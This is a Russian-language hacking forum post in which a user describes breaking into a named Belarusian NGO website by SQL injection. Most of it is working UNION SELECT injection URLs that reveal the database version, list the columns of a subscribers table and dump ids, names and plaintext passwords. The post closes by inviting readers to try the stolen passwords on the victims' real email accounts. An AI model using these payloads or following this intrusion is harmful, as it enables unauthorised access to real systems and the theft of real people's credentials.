Показать сообщение отдельно

  #6670  
Старый 27.09.2008, 12:14
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
С нами: 9420866

Репутация: 228
По умолчанию

БЕЛОРУССКАЯ АССОЦИАЦИЯ СОЦИАЛЬНЫХ РАБОТНИКОВ

http://basw-ngo-by.net/

Фух бла, ну и заепался я его исследовать. Таблицы какие-то странные ваще вконце пошли. Но сам результат:

Код:
http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--
5.0.51a-community-log

Таблиц всего 59 насчитал. Перечислять тут небуду, т.к. займет много места)

Главное - в таблице basw_ru_subscribers был обнаружен столбец - pass. Чем она собсна мя и заинтересовала:

Код:
http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,column_name,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x626173775f72755f7375627363726962657273+limit+0,1--
Код:
id
name
last_name
email
pass
group2
name_org
time
Код:
http://basw-ngo-by.net/page.php?parent=0&issue_id=2613+union+select+1,2,concat_ws(id,0x3a,name,0x3a,pass),4,5,6,7,8,9,10,11,12+from+basw_ru_subscribers+limit+0,1--
Ну и пошли логины и пассы (в открытом виде)

Раз сайт "Ассоциация.....", то вполне возможно ассоциировать етот пароль с настоящим мылом. Кому захочется - пробуйте
 
Ответить с цитированием